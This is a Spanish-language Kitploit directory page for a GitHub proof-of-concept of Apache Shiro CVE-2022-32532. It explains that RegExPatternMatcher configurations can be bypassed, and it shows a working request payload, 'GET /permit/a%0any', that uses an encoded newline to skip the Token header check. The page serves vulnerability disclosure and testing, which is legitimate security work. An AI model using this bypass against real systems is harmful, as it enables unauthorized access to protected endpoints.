Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
Herramientas/GitHubGitHub/lay0us/cve-2022-32532
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

Ver Repositorio
1325hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-32532

acerca de

Este es un proyecto de demostración, que solo muestra una de las condiciones para explotar esta vulnerabilidad (CVE-2022-32532).

De hecho, hay más formas de explotarla, siempre que los desarrolladores usen RegExPatternMatcher, existirá una posible vulnerabilidad de omisión.

introducción

Se requiere la verificación del encabezado de solicitud Token bajo la configuración actual, de lo contrario no tiene permiso para acceder a la interfaz bajo /permit

Esta solicitud puede tener éxito

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

No se permite el acceso cuando no hay un encabezado de solicitud Token

root@kitploit:~
GET /permit/any HTTP/1.1

Se puede omitir de una manera sencilla en configuraciones especiales pero comunes

root@kitploit:~
GET /permit/a%0any HTTP/1.1

referencia

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

Esta vulnerabilidad es similar a Spring-Security CVE-2022-22978

Agradecimientos a bdemers (Apache Shiro PMC) y chybeta (Investigador de Seguridad)

Descargar herramienta